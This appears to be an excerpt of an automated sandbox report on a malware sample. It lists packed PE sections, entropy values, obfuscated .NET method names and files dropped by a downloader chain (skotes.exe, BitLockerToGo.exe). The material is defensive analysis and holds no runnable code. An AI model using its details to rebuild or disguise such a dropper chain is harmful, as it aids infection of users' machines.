Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: KbSwZup.exe.6.dr	Static PE information: section name:
Source: KbSwZup.exe.6.dr	Static PE information: section name: .idata
Source: KbSwZup.exe.6.dr	Static PE information: section name:
Source: KbSwZup.exe.6.dr	Static PE information: section name: byidmovu
Source: KbSwZup.exe.6.dr	Static PE information: section name: ifcaqyxp
Source: KbSwZup.exe.6.dr	Static PE information: section name: .taggant
Source: random[3].exe.6.dr	Static PE information: section name:
Source: random[3].exe.6.dr	Static PE information: section name: .idata
Source: random[3].exe.6.dr	Static PE information: section name:
Source: random[3].exe.6.dr	Static PE information: section name: nilnxrfd
Source: random[3].exe.6.dr	Static PE information: section name: fegmkaub
Source: random[3].exe.6.dr	Static PE information: section name: .taggant
Source: 6761aae677.exe.6.dr	Static PE information: section name:
Source: 6761aae677.exe.6.dr	Static PE information: section name: .idata
Source: 6761aae677.exe.6.dr	Static PE information: section name:
Source: 6761aae677.exe.6.dr	Static PE information: section name: nilnxrfd
Source: 6761aae677.exe.6.dr	Static PE information: section name: fegmkaub
Source: 6761aae677.exe.6.dr	Static PE information: section name: .taggant
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name: .idata
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name: efrqcofg
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name: yqrfybbc
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name: .taggant
Source: ViGgA8C.exe.6.dr	Static PE information: section name:
Source: ViGgA8C.exe.6.dr	Static PE information: section name: .idata
Source: ViGgA8C.exe.6.dr	Static PE information: section name:
Source: ViGgA8C.exe.6.dr	Static PE information: section name: efrqcofg
Source: ViGgA8C.exe.6.dr	Static PE information: section name: yqrfybbc
Source: ViGgA8C.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name: .symtab
Source: xkV9ZML[1].exe.6.dr	Static PE information: section name: .CODE
Source: xkV9ZML.exe.6.dr	Static PE information: section name: .CODE
Source: b7b5e2e140.exe.6.dr	Static PE information: section name: .symtab
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: gfrqabhk
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: clsldkbz
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: sofxbkhh
Source: random[1].exe1.6.dr	Static PE information: section name: aglvcmjg
Source: random[1].exe1.6.dr	Static PE information: section name: .taggant
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: gfrqabhk
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: clsldkbz
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: .taggant
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name:
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name: .idata
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name:
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name: sofxbkhh
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name: aglvcmjg
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: vzyisczj
Source: random[2].exe.6.dr	Static PE information: section name: dmlhidtb
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: 976cb97ff6.exe.6.dr	Static PE information: section name:
Source: 976cb97ff6.exe.6.dr	Static PE information: section name: .idata
Source: 976cb97ff6.exe.6.dr	Static PE information: section name:
Source: 976cb97ff6.exe.6.dr	Static PE information: section name: vzyisczj
Source: 976cb97ff6.exe.6.dr	Static PE information: section name: dmlhidtb
Source: 976cb97ff6.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name: .idata
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name: zupxjdus
Source: random[2].exe0.6.dr	Static PE information: section name: uobxgjrq
Source: random[2].exe0.6.dr	Static PE information: section name: .taggant
Source: cbf2b6294a.exe.6.dr	Static PE information: section name:
Source: cbf2b6294a.exe.6.dr	Static PE information: section name: .idata
Source: cbf2b6294a.exe.6.dr	Static PE information: section name:
Source: cbf2b6294a.exe.6.dr	Static PE information: section name: zupxjdus
Source: cbf2b6294a.exe.6.dr	Static PE information: section name: uobxgjrq
Source: cbf2b6294a.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: ntxndjay
Source: random[2].exe1.6.dr	Static PE information: section name: aqsepqko
Source: random[2].exe1.6.dr	Static PE information: section name: .taggant
Source: 14b550e5e3.exe.6.dr	Static PE information: section name:
Source: 14b550e5e3.exe.6.dr	Static PE information: section name: .idata
Source: 14b550e5e3.exe.6.dr	Static PE information: section name:
Source: 14b550e5e3.exe.6.dr	Static PE information: section name: ntxndjay
Source: 14b550e5e3.exe.6.dr	Static PE information: section name: aqsepqko
Source: 14b550e5e3.exe.6.dr	Static PE information: section name: .taggant
Source: KbSwZup[1].exe.6.dr	Static PE information: section name:
Source: KbSwZup[1].exe.6.dr	Static PE information: section name: .idata
Source: KbSwZup[1].exe.6.dr	Static PE information: section name:
Source: KbSwZup[1].exe.6.dr	Static PE information: section name: byidmovu
Source: KbSwZup[1].exe.6.dr	Static PE information: section name: ifcaqyxp
Source: KbSwZup[1].exe.6.dr	Static PE information: section name: .taggant
Source: lt8kslFxQ.exe.29.dr	Static PE information: section name: hcpwmnu

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0070D91C push ecx; ret	6_2_0070D92F
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_0044F2F6 push cs; iretd	10_2_0044F319
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_0044C5EC pushfd ; retf	10_2_0044C5ED
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_0044C6D5 push FFFFFFCEh; ret	10_2_0044C6DB
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_0044F6F9 push ebp; iretd	10_2_0044F6FA
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_00446FC0 push eax; mov dword ptr [esp], D2DDDC2Fh	10_2_00446FC1
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 19_2_0044E89B push eax; iretd	19_2_0044E8B1
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 19_2_0044D134 push cs; retf	19_2_0044D135
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 19_2_0044E316 push es; iretd	19_2_0044E317
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 19_2_00444E10 push eax; mov dword ptr [esp], 85848BBAh	19_2_00444E14
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 19_2_00449638 push ebp; iretd	19_2_00449646
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 19_2_0044B711 push edx; iretd	19_2_0044B712
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 23_2_00864E10 push eax; mov dword ptr [esp], 85848BBAh	23_2_00864E14

Source: 1w5RpHuliE.exe	Static PE information: section name: entropy: 7.982868829607168
Source: 1w5RpHuliE.exe	Static PE information: section name: fhqdylkh entropy: 7.954289518526691
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.982868829607168
Source: skotes.exe.0.dr	Static PE information: section name: fhqdylkh entropy: 7.954289518526691
Source: KbSwZup.exe.6.dr	Static PE information: section name: entropy: 7.153233435039762
Source: KbSwZup.exe.6.dr	Static PE information: section name: byidmovu entropy: 7.952929234258028
Source: random[3].exe.6.dr	Static PE information: section name: nilnxrfd entropy: 7.9225367870900545
Source: 6761aae677.exe.6.dr	Static PE information: section name: nilnxrfd entropy: 7.9225367870900545
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name: entropy: 7.966652808119376
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: ViGgA8C.exe.6.dr	Static PE information: section name: entropy: 7.966652808119376
Source: ViGgA8C.exe.6.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: entropy: 7.98240674670441
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: random[1].exe1.6.dr	Static PE information: section name: entropy: 7.109445854466861
Source: random[1].exe1.6.dr	Static PE information: section name: sofxbkhh entropy: 7.952376792886271
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: entropy: 7.98240674670441
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: gfrqabhk entropy: 7.953368544557863
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name: entropy: 7.109445854466861
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name: sofxbkhh entropy: 7.952376792886271
Source: random[2].exe.6.dr	Static PE information: section name: entropy: 7.939190193368214
Source: random[2].exe.6.dr	Static PE information: section name: vzyisczj entropy: 7.9523562783903605
Source: 976cb97ff6.exe.6.dr	Static PE information: section name: entropy: 7.939190193368214
Source: 976cb97ff6.exe.6.dr	Static PE information: section name: vzyisczj entropy: 7.9523562783903605
Source: random[2].exe0.6.dr	Static PE information: section name: entropy: 7.1446818618839645
Source: random[2].exe0.6.dr	Static PE information: section name: zupxjdus entropy: 7.953978203292558
Source: cbf2b6294a.exe.6.dr	Static PE information: section name: entropy: 7.1446818618839645
Source: cbf2b6294a.exe.6.dr	Static PE information: section name: zupxjdus entropy: 7.953978203292558
Source: random[2].exe1.6.dr	Static PE information: section name: ntxndjay entropy: 7.921597900683144
Source: PqodvBZ[1].exe.6.dr	Static PE information: section name: .text entropy: 7.825039084751462
Source: 14b550e5e3.exe.6.dr	Static PE information: section name: ntxndjay entropy: 7.921597900683144
Source: PqodvBZ.exe.6.dr	Static PE information: section name: .text entropy: 7.825039084751462
Source: KbSwZup[1].exe.6.dr	Static PE information: section name: entropy: 7.153233435039762
Source: KbSwZup[1].exe.6.dr	Static PE information: section name: byidmovu entropy: 7.952929234258028
Source: lt8kslFxQ.exe.29.dr	Static PE information: section name: CODE entropy: 7.2282096496986

Source: xkV9ZML[1].exe.6.dr, Program.cs	High entropy of concatenated method names: 'DD4S3OEfw', 'jqWIrxRs1lelGNfiwAt', 'XoqH4cRB6P1VJZb7oNl', 'RUfOdPRdhaTeh6x0qJm', 'flBxJSR6lMmlh59CHVm', 'VirtualProtect', 'CallWindowProcA', 'ParseTree', 'LookupPointer', 'Main'
Source: xkV9ZML[1].exe.6.dr, AOPsjhnAUIoa.cs	High entropy of concatenated method names: 'cijnxIAjsbAki', 'comzmbzAYvbsuyw', 'OvmczjnAiw', 'WaxmAmbjxK', 'XopmxbzAYbh', 'OxcmzlAoxnoAoiwur', 'xJiZanRRwP3y3tNXQaH', 'S3Q4WlzqM7aQVT4LDN', 'JJe1vvRU1eX4ic5j26J', 'm4dfBiRFgTrXp5NJ5mn'
Source: xkV9ZML.exe.6.dr, Program.cs	High entropy of concatenated method names: 'DD4S3OEfw', 'jqWIrxRs1lelGNfiwAt', 'XoqH4cRB6P1VJZb7oNl', 'RUfOdPRdhaTeh6x0qJm', 'flBxJSR6lMmlh59CHVm', 'VirtualProtect', 'CallWindowProcA', 'ParseTree', 'LookupPointer', 'Main'
Source: xkV9ZML.exe.6.dr, AOPsjhnAUIoa.cs	High entropy of concatenated method names: 'cijnxIAjsbAki', 'comzmbzAYvbsuyw', 'OvmczjnAiw', 'WaxmAmbjxK', 'XopmxbzAYbh', 'OxcmzlAoxnoAoiwur', 'xJiZanRRwP3y3tNXQaH', 'S3Q4WlzqM7aQVT4LDN', 'JJe1vvRU1eX4ic5j26J', 'm4dfBiRFgTrXp5NJ5mn'
Source: random[1].exe0.6.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: random[1].exe0.6.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: 4dfe6dfd76.exe.6.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: 4dfe6dfd76.exe.6.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: 7.2.xkV9ZML.exe.5b80000.1.raw.unpack, Program.cs	High entropy of concatenated method names: 'DD4S3OEfw', 'jqWIrxRs1lelGNfiwAt', 'XoqH4cRB6P1VJZb7oNl', 'RUfOdPRdhaTeh6x0qJm', 'flBxJSR6lMmlh59CHVm', 'VirtualProtect', 'CallWindowProcA', 'ParseTree', 'LookupPointer', 'Main'
Source: 7.2.xkV9ZML.exe.5b80000.1.raw.unpack, AOPsjhnAUIoa.cs	High entropy of concatenated method names: 'cijnxIAjsbAki', 'comzmbzAYvbsuyw', 'OvmczjnAiw', 'WaxmAmbjxK', 'XopmxbzAYbh', 'OxcmzlAoxnoAoiwur', 'xJiZanRRwP3y3tNXQaH', 'S3Q4WlzqM7aQVT4LDN', 'JJe1vvRU1eX4ic5j26J', 'm4dfBiRFgTrXp5NJ5mn'
Source: 7.2.xkV9ZML.exe.3919550.0.raw.unpack, Program.cs	High entropy of concatenated method names: 'DD4S3OEfw', 'jqWIrxRs1lelGNfiwAt', 'XoqH4cRB6P1VJZb7oNl', 'RUfOdPRdhaTeh6x0qJm', 'flBxJSR6lMmlh59CHVm', 'VirtualProtect', 'CallWindowProcA', 'ParseTree', 'LookupPointer', 'Main'
Source: 7.2.xkV9ZML.exe.3919550.0.raw.unpack, AOPsjhnAUIoa.cs	High entropy of concatenated method names: 'cijnxIAjsbAki', 'comzmbzAYvbsuyw', 'OvmczjnAiw', 'WaxmAmbjxK', 'XopmxbzAYbh', 'OxcmzlAoxnoAoiwur', 'xJiZanRRwP3y3tNXQaH', 'S3Q4WlzqM7aQVT4LDN', 'JJe1vvRU1eX4ic5j26J', 'm4dfBiRFgTrXp5NJ5mn'
Source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'

Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-8GGH0.tmp	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\null[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-HLFAC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-IITTO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe	File created: C:\ProgramData\FileBasedAssistant\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KbSwZup[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-MAOAB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	File created: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-6VG7K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-039KC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xkV9ZML[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Temp\N53e5EuJZ3s\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\icuin51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-IDMIC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BKKJD.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Temp\N53e5EuJZ3s\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\Qt5Concurrent.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Bjkm5hE[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe	File created: C:\ProgramData\FileBasedAssistant\FileBasedAssistant.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\uninstall\is-R6VPL.tmp	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\msvcr100.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BKKJD.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077992001\b7b5e2e140.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PqodvBZ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\libGLESv2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\libEGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\icuuc51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BKKJD.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-BIN45.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\null[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Roaming\X0n19nL\lt8kslFxQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-0DVH1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	File created: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\msvcp100.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1078003001\PqodvBZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ViGgA8C[1].exe	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\null[2]	Jump to dropped file

Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe	File created: C:\ProgramData\FileBasedAssistant\sqlite3.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe	File created: C:\ProgramData\FileBasedAssistant\FileBasedAssistant.exe			Jump to dropped file

